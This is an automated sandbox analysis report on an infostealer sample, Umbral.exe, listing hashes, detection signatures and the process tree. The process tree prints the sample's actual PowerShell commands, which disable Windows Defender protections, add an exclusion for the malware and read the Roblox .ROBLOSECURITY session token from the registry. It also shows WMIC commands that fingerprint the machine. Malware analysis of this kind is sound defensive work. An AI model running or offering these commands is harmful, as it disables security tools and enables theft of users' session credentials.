Analysis
-
max time kernel
81s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 18:07
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240903-en
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
50bc3bab2a3553f7b55fbc5a6fa1275f
-
SHA1
83f6672fee979dec40ee154519c9cd7d3aa79bb4
-
SHA256
f3073b18151ae854112999b803ef10b70447d908a3cb0b2c27e91740a3fb2370
-
SHA512
a0c0b1d7b2e9dae8c1e4315b2002eaf2caddd3639986f053f3874e7e7c715e60d20f4893d0b456d7289503146ace6fde934e1f807b5483ff28a592bfac55d150
-
SSDEEP
6144:lloZMHrIkd8g+EtXHkv/iD4SZ+lTwk7+iTlwsJOhK28e1mmi:noZIL+EP8SZ+lTwk7+iTlwsJIw
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2956-1-0x0000000000DE0000-0x0000000000E20000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2892 powershell.exe 2720 powershell.exe 2480 powershell.exe 2836 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2892 powershell.exe 2720 powershell.exe 2480 powershell.exe 2952 powershell.exe 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Umbral.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 2956 Umbral.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeIncreaseQuotaPrivilege 1796 wmic.exe Token: SeSecurityPrivilege 1796 wmic.exe Token: SeTakeOwnershipPrivilege 1796 wmic.exe Token: SeLoadDriverPrivilege 1796 wmic.exe Token: SeSystemProfilePrivilege 1796 wmic.exe Token: SeSystemtimePrivilege 1796 wmic.exe Token: SeProfSingleProcessPrivilege 1796 wmic.exe Token: SeIncBasePriorityPrivilege 1796 wmic.exe Token: SeCreatePagefilePrivilege 1796 wmic.exe Token: SeBackupPrivilege 1796 wmic.exe Token: SeRestorePrivilege 1796 wmic.exe Token: SeShutdownPrivilege 1796 wmic.exe Token: SeDebugPrivilege 1796 wmic.exe Token: SeSystemEnvironmentPrivilege 1796 wmic.exe Token: SeRemoteShutdownPrivilege 1796 wmic.exe Token: SeUndockPrivilege 1796 wmic.exe Token: SeManageVolumePrivilege 1796 wmic.exe Token: 33 1796 wmic.exe Token: 34 1796 wmic.exe Token: 35 1796 wmic.exe Token: SeIncreaseQuotaPrivilege 1796 wmic.exe Token: SeSecurityPrivilege 1796 wmic.exe Token: SeTakeOwnershipPrivilege 1796 wmic.exe Token: SeLoadDriverPrivilege 1796 wmic.exe Token: SeSystemProfilePrivilege 1796 wmic.exe Token: SeSystemtimePrivilege 1796 wmic.exe Token: SeProfSingleProcessPrivilege 1796 wmic.exe Token: SeIncBasePriorityPrivilege 1796 wmic.exe Token: SeCreatePagefilePrivilege 1796 wmic.exe Token: SeBackupPrivilege 1796 wmic.exe Token: SeRestorePrivilege 1796 wmic.exe Token: SeShutdownPrivilege 1796 wmic.exe Token: SeDebugPrivilege 1796 wmic.exe Token: SeSystemEnvironmentPrivilege 1796 wmic.exe Token: SeRemoteShutdownPrivilege 1796 wmic.exe Token: SeUndockPrivilege 1796 wmic.exe Token: SeManageVolumePrivilege 1796 wmic.exe Token: 33 1796 wmic.exe Token: 34 1796 wmic.exe Token: 35 1796 wmic.exe Token: SeIncreaseQuotaPrivilege 1324 wmic.exe Token: SeSecurityPrivilege 1324 wmic.exe Token: SeTakeOwnershipPrivilege 1324 wmic.exe Token: SeLoadDriverPrivilege 1324 wmic.exe Token: SeSystemProfilePrivilege 1324 wmic.exe Token: SeSystemtimePrivilege 1324 wmic.exe Token: SeProfSingleProcessPrivilege 1324 wmic.exe Token: SeIncBasePriorityPrivilege 1324 wmic.exe Token: SeCreatePagefilePrivilege 1324 wmic.exe Token: SeBackupPrivilege 1324 wmic.exe Token: SeRestorePrivilege 1324 wmic.exe Token: SeShutdownPrivilege 1324 wmic.exe Token: SeDebugPrivilege 1324 wmic.exe Token: SeSystemEnvironmentPrivilege 1324 wmic.exe Token: SeRemoteShutdownPrivilege 1324 wmic.exe Token: SeUndockPrivilege 1324 wmic.exe Token: SeManageVolumePrivilege 1324 wmic.exe Token: 33 1324 wmic.exe Token: 34 1324 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
Umbral.exedescription pid process target process PID 2956 wrote to memory of 2892 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2892 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2892 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2720 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2720 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2720 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2480 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2480 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2480 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2952 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2952 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2952 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 1796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 1796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 1796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 1324 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 1324 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 1324 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 796 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 2836 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2836 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 2836 2956 Umbral.exe powershell.exe PID 2956 wrote to memory of 284 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 284 2956 Umbral.exe wmic.exe PID 2956 wrote to memory of 284 2956 Umbral.exe wmic.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2836
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:284
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d930f6b56caa4ab2f061c6e1122a3419
SHA1f80ca3da256e7ae8fccb624721519e5df34ec818
SHA256d4ef3e80aac850fd8b11b3a7af047dbe9ffa987b2f5dc6df2d9f7afc67d4bfb8
SHA512f53c5cd2cef62024b90187ebf7e4c12437110ae63e28a42cbd23fc87fb6098545c04576530203b1ee9c71802ccae18a254beb958a21fec2ff41ebad761178ce7